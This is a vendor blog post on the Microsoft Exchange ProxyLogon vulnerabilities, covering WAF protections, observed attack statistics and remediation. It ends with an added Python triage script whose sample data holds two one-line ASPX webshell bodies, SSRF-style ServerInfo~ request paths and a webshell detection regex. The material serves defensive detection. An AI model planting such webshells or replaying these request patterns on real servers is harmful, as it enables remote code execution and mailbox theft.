Co-authored by Ryan Barnett.
AppSec Protections for Microsoft Exchange CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065
On March 2, 2021, the Microsoft Security Response Center alerted its customers to several critical security updates to Microsoft Exchange Server, addressing vulnerabilities currently under attack.
The Cybersecurity and Infrastructure Security Agency (CISA), which operates the United States Computer Emergency Readiness Team (US-CERT), also issued an alert with recommendations on how to mitigate the vulnerabilities.
- CVE-2021-26855 is a Server-Side Request Forgery (SSRF) vulnerability that allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. In the observed attacks it is used to reach the Exchange Control Panel (ECP), and it also allows the attacker to gain access to mailboxes and read sensitive information.
- CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 allow for remote code execution.
- CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary file write vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server.
- CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server.
- To check for a possible compromise via these CVEs, we encourage you to read the Microsoft advisory.
How Akamai Can Help
Customers that use Akamai Web Application Firewall solutions, Kona Site Defender and Web Application Protector, with the Automated Attack Groups engine have received an automatic update for protection. Akamai recommends that customers using Automated Attack Groups set all their attack groups, but specifically the Web Platform Attack Group, to Deny to prevent these exploitation attempts.
Kona Site Defender customers using Kona Rule Set (KRS) should update their profile and enable the newly released rule IDs 3000083 and 3000084 in the Total Request Score (Inbound) attack group in order to protect against attempts to exploit the following CVEs:
- CVE-2021-26855, which is the SSRF vulnerability
- CVE-2021-27065, which is being used to upload webshells
Akamai recommends that either the attack group or the individual KRS rules be put into Deny mode to protect against attempts to exploit these vulnerabilities.
Akamai's research and intelligence teams observed that attackers have been quick to automate their target identification and exploitation attempts. A variety of existing controls in Akamai's security portfolio are designed to detect these attempts:
- Web Application Firewall -- Rate Controls, the TOR IP Blocklist, and Penalty Box also detect and block this scanning traffic
- Client Reputation -- the "Web Scanner" and "Web Attacker" categories identify many of the attackers searching for vulnerable targets
- Bot Management -- controls identify the incoming traffic as automated or as originating from anonymous proxies
If you have any questions, please reach out to Akamai Support Services or your account team.
Global Attack Intelligence
Over the last 48 hours, on our global platform, we have observed:
- 290,000 unique attempts to scan and/or exploit these vulnerabilities
- 952 unique IPs involved in these attempts
- 731 of these unique IPs were identified by Akamai Client Reputation threat intelligence as known web scanners or web attackers with a median score of 9.6 out of 10
- 23,910 unique hosts targeted
- 80% of attack activity targeted against Commerce, High-Tech, Financial Services, and Manufacturing verticals
- 90% of all attack attempts targeted against organizations in the United States, Austria, India, Canada, Germany, France and the United Kingdom
- Assetnote and Qualys were the top two known scanners
Conclusion and Recommended Steps
We've confirmed active attempts of exploitation of Microsoft Exchange/Outlook Web Access zero-day vulnerabilities.
Successful exploitation allows an unauthenticated attacker to execute arbitrary code and install webshells on vulnerable Exchange Servers, enabling the attacker to gain persistent system access, as well as access to files and mailboxes on the server and to credentials stored on that system.
Mitigation and remediation can be achieved by following these steps:
- Akamai customers that have Exchange/Outlook Web Access protected by either Kona Site Defender using the Automated Attack Groups rule set or the Web Application Protector product have already received an automatic update to the Web Platform Attack Group. Kona Site Defender customers that are using the Kona Rule Set, however, need to take steps to activate the new rules to receive protection.
- Customers should also deploy updates to affected Exchange Servers as recommended by Microsoft and enable the Akamai protections as recommended above.
- Customers should investigate their Exchange Servers for signs of exploitation and for indicators of persistence, such as webshells.
- Customers should remediate any identified exploitation or persistence and investigate their environment for indicators of lateral movement or further compromise.
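As an added illustration of the investigation step above (this is example code written for this page, not part of the original post or of Akamai's tooling), the Python below applies two of the indicators from Microsoft's public HAFNIUM guidance to constructed sample data: HttpProxy log rows where no user authenticated but the request was anchored to a backend with a ServerInfo~ value (the CVE-2021-26855 proxying pattern), and .aspx files sitting in the directories named as webshell drop locations. The log sample, the file inventory, the exact set of drop directories and the webshell regex are all assumptions made for the example; real HttpProxy logs carry many more columns than the simplified sample here.

```python
"""Offline triage helpers for the Exchange ProxyLogon indicators: unauthenticated
ECP requests anchored to a backend via ServerInfo~ (CVE-2021-26855) and .aspx
files dropped in web-exposed Exchange directories (CVE-2021-27065 webshells)."""
import csv
import re
from pathlib import PureWindowsPath

# Constructed, simplified HttpProxy log sample. Real logs live under
# <ExchangeInstallPath>\Logging\HttpProxy\Ecp and carry many more columns;
# the column names used here are the real ones.
SAMPLE_HTTPPROXY_LOG = """\
#Software: Microsoft Exchange Server
#Log-type: HttpProxy Logs
#Fields: DateTime,RequestId,ClientIpAddress,UrlStem,AuthenticatedUser,AnchorMailbox,HttpStatus
2021-03-03T10:15:01.000Z,r1,203.0.113.10,/ecp/default.flt,,ServerInfo~mail01.example.com/ecp/proxyLogon.ecp,200
2021-03-03T10:15:02.000Z,r2,198.51.100.7,/owa/auth/logon.aspx,,,200
2021-03-03T10:15:03.000Z,r3,10.0.0.5,/ecp/default.aspx,EXAMPLE\\jdoe,Sid~S-1-5-21-1000-2000-3000-1105,200
2021-03-03T10:15:04.000Z,r4,203.0.113.10,/ecp/y.js,,ServerInfo~mail01.example.com/ecp/DDI/DDIService.svc/SetObject,200
"""

# Constructed file inventory (path -> content) standing in for a directory walk.
SAMPLE_FILES = {
    r"C:\inetpub\wwwroot\aspnet_client\system_web\4_0_30319\error.aspx":
        '<script language="JScript" runat="server">function Page_Load(){eval(Request["cmd"],"unsafe");}</script>',
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx":
        '<%@ Page language="c#" %><html>legitimate sign-in page</html>',
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\current\themes\resources\help.aspx":
        '<%@ Page Language="C#" %><% System.IO.File.WriteAllText(Request.Form["f"], Request.Form["d"]); %>',
    r"C:\inetpub\wwwroot\aspnet_client\system_web\WebUIValidation.js": "// legitimate client script",
}

# Drop directories named in Microsoft's guidance (assumed to be the full set here).
DROP_DIRS = (
    PureWindowsPath(r"C:\inetpub\wwwroot\aspnet_client"),
    PureWindowsPath(r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth"),
)

# Heuristic (assumed): server-side code that evaluates or writes whatever the request carries.
WEBSHELL_RE = re.compile(
    r'eval\s*\(\s*Request|Request\.(Form|QueryString|Item)\s*\[|WriteAllText\s*\(\s*Request',
    re.IGNORECASE,
)


def parse_httpproxy_log(text):
    """Yield one dict per data row, taking column names from the #Fields header."""
    fields = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw.startswith("#"):
            if raw.startswith("#Fields:"):
                fields = [f.strip() for f in raw[len("#Fields:"):].split(",")]
            continue
        if fields is None:
            raise ValueError("data row appeared before the #Fields header")
        yield dict(zip(fields, next(csv.reader([raw]))))


def find_ssrf_indicators(text):
    """Rows where nobody authenticated yet the request was routed to a backend by a
    ServerInfo~ anchor. Legitimate traffic is anchored by Sid~ or an SMTP address
    once a user has authenticated, so this combination is worth a closer look."""
    return [
        row for row in parse_httpproxy_log(text)
        if row.get("AuthenticatedUser", "") == ""
        and row.get("AnchorMailbox", "").startswith("ServerInfo~")
    ]


def _under(path, directory):
    # PureWindowsPath comparison is case-insensitive, matching NTFS semantics.
    return directory == path or directory in path.parents


def suspicious_aspx(files):
    """Flag .aspx files in a drop directory: anything at all under aspnet_client
    (no .aspx belongs there), and files under owa\\auth whose body matches the
    webshell heuristic (that directory does hold legitimate .aspx pages)."""
    flagged = []
    for path, content in files.items():
        wp = PureWindowsPath(path)
        if wp.suffix.lower() != ".aspx":
            continue
        in_aspnet_client = _under(wp, DROP_DIRS[0])
        in_owa_auth = _under(wp, DROP_DIRS[1])
        if in_aspnet_client or (in_owa_auth and WEBSHELL_RE.search(content)):
            flagged.append(path)
    return sorted(flagged)


if __name__ == "__main__":
    for row in find_ssrf_indicators(SAMPLE_HTTPPROXY_LOG):
        print("SSRF indicator:", row["DateTime"], row["ClientIpAddress"], row["UrlStem"], row["AnchorMailbox"])
    for path in suspicious_aspx(SAMPLE_FILES):
        print("suspicious .aspx:", path)
```

On a real server you would feed `parse_httpproxy_log` the contents of each file under the HttpProxy\Ecp logging directory and `suspicious_aspx` a walk of the two drop directories; a hit from either function is a reason to escalate to full incident response, not proof of compromise on its own, and the absence of hits does not clear a server, because a patient attacker may have removed the webshell and the logs may have rolled.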
Companies should consider implementing Zero Trust Network Access (ZTNA) to be able to weather software vulnerabilities like these. In the traditional "verify, then trust" model, anyone who presents correct user credentials is admitted to whichever site, app, or device they request. ZTNA instead treats users and devices as never trusted: they can access applications and data only after passing a secure authentication and authorization process that does not rely on user credentials alone. You can read more about how ZTNA can protect corporate resources in the context of these Microsoft Exchange vulnerabilities in the blog post, Microsoft Exchange and Verkada Hacks: Isolate Your Apps and APIs from the Internet Cesspool.